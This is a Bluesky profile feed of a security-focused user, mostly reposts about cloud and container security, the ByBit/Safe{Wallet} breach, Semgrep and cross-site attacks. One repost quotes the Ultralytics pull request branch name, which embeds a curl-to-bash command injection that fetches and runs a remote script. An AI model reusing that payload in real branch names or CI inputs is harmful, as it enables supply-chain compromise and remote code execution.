emil
LightNews LightNews
emilpls.bsky.social
emil
@emilpls.bsky.social
42 followers 76 following 6 posts
Code/Cloud/Security
Posts Replies Media Videos
emilpls.bsky.social
Sweet!
March 18, 2025 at 5:41 PM
Reposted by emil
oalexanderdk.bsky.social
All military aid from the U.S. to Ukraine from 2014-2024 has cost the U.S. tax payer $19.94 per person per year.

In return they got to destroy Russia’s entire Soviet equipment inheritance and still complain it is a bad deal
March 9, 2025 at 1:21 AM
Reposted by emil
frichetten.com
New details on the ByBit/Safe{Wallet} breach, and uhhh wow, some really silly blunders on the DPRK side. They still succeeded which is the most upsetting part of all of this. Let's bully some threat actor tradecraft! A🧵
x.com/safe/status/...
Safe.eth on X: "Investigation Updates and Community Call to Action" / X
Investigation Updates and Community Call to Action
x.com
March 6, 2025 at 5:21 PM
emilpls.bsky.social
quick maths 60/4=15 hours per day, easy 🥵
carnage4life.bsky.social Dare Obasanjo @carnage4life.bsky.social · Mar 1
“I recommend being in the office at least every weekday…60 hours a week is the sweet spot of productivity” - Sergey Brin

Quite the vibe shift from tech employees asking about four-day workweeks.
Google’s Sergey Brin Asks Workers to Spend More Time In the Office (Gift Article)
The tech giant’s co-founder said that if employees worked harder and were in the office more, the company could reach an artificial general intelligence breakthrough.
www.nytimes.com
March 2, 2025 at 5:59 AM
emilpls.bsky.social
Very interesting work!
March 2, 2025 at 5:54 AM
Reposted by emil
webtonull.bsky.social
Reminder that the Call for Presentations for Sikkerhetsfestivalen (The Security Festival) is open. OWASP Oslo is hosting an AppSec track. Scroll down the page for English version:

sikkerhetsfestivalen.no/alle-nyheter...
February 10, 2025 at 11:20 AM
Reposted by emil
joshcgrossman.com
Seems like there's a bit of confusion around the recent @Semgrep licence change and the @opengrep fork and I think there are two key points to highlight.

1/10
January 24, 2025 at 11:04 AM
Reposted by emil
ramimac.me
I've spent dozens of hours reading State of Cloud Security reports

You know, the ones that use data from their CSPM product

And I've realized the findings substantially reflect how well that tool helps customers secure their clouds

I wrote up some examples, both good and bad (🔗 in 🧵)
December 18, 2024 at 4:50 PM
Reposted by emil
mccune.org.uk
Slides for the @bsideslondon.bsky.social container security workshop presented with @smarticu5.bsky.social and @marionmccune.bsky.social are here blog.iainsmart.co.uk/talks/BSides...
blog.iainsmart.co.uk
December 15, 2024 at 10:48 AM
Reposted by emil
mattkeeter.com
absolutely incredible attack vector
Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
December 6, 2024 at 3:27 AM
Reposted by emil
freddyb.bsky.social
Modern solutions against cross-site attacks (frederikbraun.de/modern-solut...): An article about cross-site leak attacks and browser-based defenses. You will also learn why web security best practices is always opt-in and finally how YOU can get increased security controls.
Modern solutions against cross-site attacks
Modern solutions against cross-site attacks
frederikbraun.de
November 27, 2024 at 7:50 AM
Reposted by emil
filippo.abyssdomain.expert
This is a fascinating case study of real operational use of cryptography by non-technical people, of OPSEC, of anonymity tech, and of web security.

cw: drugs
boehs.org Evan Boehs @boehs.org · Nov 30
Captchas, Monero, scams and absolutely no JavaScript. In my latest article, I examine all the moving parts that go into running the markets you've never used.

https://boehs.org/node/dark-web-security
December 2, 2024 at 11:03 AM
Reposted by emil
leonvqz.com
tailscale.com/blog/infra-t...

Awesome article by @tailscale.com team. It shows the good stuff that can happen if you take product design security and scalability from the get go. Kudos to the team, and I think at this point I should call myself a fanboy xD

I didn't know about setec. That's awesome
How Tailscale's infrastructure team stays small
Tailscale’s secure, simplified networking solution helps DevOps teams eliminate infrastructure headaches. Learn how our infra team of just three engineers uses Tailscale to handle networking, secrets,...
tailscale.com
December 2, 2024 at 1:07 PM
Reposted by emil
frichetten.com
The self described “Shodan of AWS” is now live! This is an amazing project from Daniel Grzelak that helps democratize cloud resource enumeration for the masses. Very excited about this!
awseye.com
Awseye - See Inside AWS Accounts
Awseye tracks publicly accessible AWS data to help identify and secure known and exposed AWS resources. Empowering defenders with open-source intelligence.
awseye.com
November 26, 2024 at 2:31 AM
Reposted by emil
mccune.org.uk
If you're looking for the security talks from Kubecon NA 2024, I've added the abstracts and Youtube embeds to talks.container-security.site/categories/#... .

There's also talks going back to 2016 in case you really want to watch a lot of container security videos!
Posts by Category
This site hosts a list of talks from various conferences on the topic of Cloud Native security.
talks.container-security.site
November 18, 2024 at 7:27 PM